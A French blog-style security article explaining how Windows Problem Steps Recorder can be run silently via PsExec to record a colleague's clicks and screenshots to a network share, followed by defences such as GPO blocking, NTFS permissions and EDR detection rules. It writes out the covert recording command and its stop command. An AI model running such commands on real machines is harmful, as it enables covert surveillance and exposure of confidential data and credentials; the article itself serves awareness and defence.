Détournement du PSR (Problem Steps Recorder) : l’outil d’enregistrement Windows qui devient espion
Windows intègre un utilitaire ultra pratique pour le support technique : le Problem Steps Recorder (PSR), aussi appelé Enregistreur d’actions utilisateur. Conçu pour capturer pas à pas les interactions d’un utilisateur afin de diagnostiquer un problème, il peut aussi facilement devenir un outil d’espionnage à distance.
PSR, un outil simple… et dangereux entre de mauvaises mains
PSR enregistre automatiquement :
- Les clics souris
- Les interactions clavier (partiellement)
- Les captures d’écran à chaque étape
Pour générer un rapport visuel clair, exporté en archive .zip
, qu’on peut consulter dans un navigateur.
Mais ce qui est moins connu, c’est que PSR peut être piloté en ligne de commande, avec des options permettant de désactiver l’interface graphique et d’enregistrer directement sur un chemin réseau.
Quelques options intéressantes de PSR
/start /output <chemin>
: démarre l’enregistrement et envoie le rapport à l’emplacement donné./stop
: arrête l’enregistrement./sc
: capture d’écran à chaque étape./gui 0
: désactive l’interface graphique, donc invisible pour l’utilisateur.
Avec ces options, il devient très simple de lancer PSR discrètement, sans que l’utilisateur s’en aperçoive.
Un scénario d’espionnage simple avec PsExec
Imagine un administrateur réseau un peu trop curieux (ou un attaquant interne) qui utilise l’outil PsExec (outil Microsoft Sysinternals permettant d’exécuter des commandes à distance) pour lancer PSR sur la machine d’un collègue, à son insu.
psexec \\nommachine C:\Windows\System32\psr.exe /start /gui 0 /output \\serveur\partage\rapport.zip
L’enregistrement tourne alors en fond, capturant chaque clic et chaque écran affiché, et les envoie automatiquement sur un partage réseau accessible à l’espion.
Après un moment, il suffit de stopper la session :
psr.exe /stop
Et voilà, un rapport complet, détaillé, silencieux… le rêve du voyeur numérique.
Pourquoi c’est inquiétant ?
- Invisible : pas d’interface pour alerter l’utilisateur.
- Automatisable : peut être lancé et stoppé à distance.
- Données sensibles : captures d’écran de documents confidentiels, mails, identifiants affichés, etc.
- Facilité : pas besoin d’installer de logiciel espion tiers, PSR est déjà présent sur toutes les machines Windows.
Comment se prémunir ?
- Surveiller les processus actifs (
psr.exe
) et alertes sur démarrage anormal. - Restreindre l’usage de PsExec et autres outils à distance aux seuls administrateurs de confiance.
- Restreindre l’accès à PSR via les stratégies de groupe (GPO) en entreprise.
- Sensibiliser les utilisateurs et auditer régulièrement les logs d’activité.
- Utiliser des solutions de détection d’intrusions internes (EDR) pour détecter ce type de comportements anormaux.
Guide pour bloquer ou restreindre l’utilisation de PSR
a) Bloquer PSR via les Stratégies de Groupe (GPO)
- Ouvre l’éditeur de gestion des stratégies de groupe (
gpedit.msc
). - Navigue vers :
Configuration utilisateur
>Modèles d'administration
>Système
- Cherche une stratégie nommée « Ne pas exécuter les applications Windows spécifiées ».
- Active-la, puis dans la liste des applications interdites, ajoute :
psr.exe
Cela empêchera les utilisateurs d’exécuter PSR.
b) Supprimer ou renommer l’exécutable PSR
Pour les environnements plus restrictifs, tu peux :
- Renommer ou déplacer
psr.exe
situé dans :
C:\Windows\System32\psr.exe
(Attention, cette méthode peut être contournée par un utilisateur admin.) - Supprimer le fichier (non recommandé car modification système).
c) Limiter l’accès avec permissions NTFS
- Sur le fichier
psr.exe
, clique droit > Propriétés > Sécurité. - Retire les droits d’exécution pour les utilisateurs non-administrateurs.
d) Surveiller et alerter via outils EDR/antivirus
- Configure des règles pour détecter le lancement de
psr.exe
avec les options/start /gui 0
. - Alerte automatique en cas d’exécution suspecte.
e) Sensibilisation et bonnes pratiques
- Informer les utilisateurs que PSR ne doit être utilisé qu’avec accord.
- Former les administrateurs pour qu’ils n’utilisent pas cet outil à des fins non éthiques.
Conclusion
Le PSR est un outil génial pour le support technique, mais comme toujours, dès qu’un outil est puissant et simple, il peut être détourné pour espionner. Microsoft a beau vouloir aider, la puissance donnée entre de mauvaises mains peut vite devenir un cauchemar.
Si tu gères un parc Windows, garde un œil sur PSR, car c’est un cheval de Troie numérique bien caché, capable de faire parler tes utilisateurs… sans qu’ils le sachent.